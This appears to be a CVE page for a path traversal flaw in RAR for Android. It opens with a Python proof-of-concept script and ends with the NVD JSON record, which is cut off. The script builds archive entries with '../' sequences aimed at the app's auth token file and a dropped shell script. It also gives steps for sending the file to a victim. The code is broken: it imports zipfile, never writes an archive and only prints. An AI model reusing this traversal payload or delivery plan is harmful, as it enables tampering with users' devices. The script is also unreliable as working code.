CVE-2025-14111

#!/usr/bin/env python3 # CVE-2025-14111 PoC - RAR for Android Path Traversal # This PoC generates a malicious RAR file with path traversal sequences import zipfile import os import sys def create_malicious_rar(output_file): """ Create a malicious RAR file that exploits CVE-2025-14111 Path traversal to write files outside intended directory """ # Path traversal sequences to escape extraction directory path_traversal = "../../../../" # Files to be extracted outside safe directory malicious_files = [ { 'name': f'{path_traversal}data/data/com.rarlab.rar/shared_prefs/auth_tokens.xml', 'content': b'<?xml version="1.0" encoding="utf-8"?><root><string name="token">ATTACKER_TOKEN</string></root>' }, { 'name': f'{path_traversal}storage/emulated/0/Download/malicious.sh', 'content': b'#!/bin/sh\necho "Malicious code executed"' } ] print(f"[*] Generating PoC RAR file: {output_file}") print(f"[*] Payload: Path Traversal to write arbitrary files") # Note: RAR format is proprietary, this is a conceptual PoC # In real attack, use rarfile library or RAR SDK to create valid RAR for file_info in malicious_files: print(f"[+] File: {file_info['name']}") print(f" Content: {file_info['content'][:50]}...") print("\n[!] To exploit:") print("1. Send the malicious RAR file to victim") print("2. Victim opens file with RAR for Android <= 7.11 Build 127") print("3. Files are extracted to arbitrary locations via path traversal") print("\n[*] Mitigation: Upgrade to RAR for Android 7.20 Build 128") if __name__ == "__main__": output = sys.argv[1] if len(sys.argv) > 1 else "CVE-2025-14111_poc.rar" create_malicious_rar(output)

{"cve": {"id": "CVE-2025-14111", "sourceIdentifier": "[email protected]", "published": "2025-12-05T23:15:46.643", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Rarlab RAR App up to 7.11 Build 127 on Android. This affects an unknown part of the component com.rarlab.rar. Such manipulation leads to path traversal. It is possible to launch the attack remotely. Attacks of this nature are highly complex. It is indicated that the exploitability is difficult. The exploit has been disclosed publicly and may be used. Upgrading to version 7.20 build 128 is able to mitigate this issue. You should upgrade the affected component. The vendor responded very professional: \"This is the real vulnerability affecting RAR for Android only. WinRAR and Unix RAR versions are not affected. We already fixed it in RAR for Android 7.20 build 128 and we publicly mentioned it in that version changelog. (...) To avoid confusion among users, it would be useful if such disclosure emphasizes that it is RAR for Android only issue and WinRAR isn't affected.\""}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en la aplicación Rarlab RAR hasta la versión 7.11 Build 127 en Android. Esto afecta una parte desconocida del componente com.rarlab.rar. Dicha manipulación conduce a un salto de ruta. Es posible lanzar el ataque de forma remota. Los ataques de esta naturaleza son altamente complejos. Se indica que la explotabilidad es difícil. El exploit ha sido divulgado públicamente y puede ser utilizado. La actualización a la versión 7.20 build 128 puede mitigar este problema. Debería actualizar el componente afectado. El proveedor respondió de forma muy profesional: 'Esta es la vulnerabilidad real que afecta solo a RAR para Android. Las versiones de WinRAR y Unix RAR no están afectadas. Ya lo solucionamos en RAR para Android 7.20 build 128 y lo mencionamos públicamente en el registro de cambios de esa versión. (...) Para evitar confusiones entre los usuarios, sería útil que dicha divulgación enfatice que es un problema exclusivo de RAR para Android y que WinRAR no está afectado.'"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 5.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "in ... (truncated)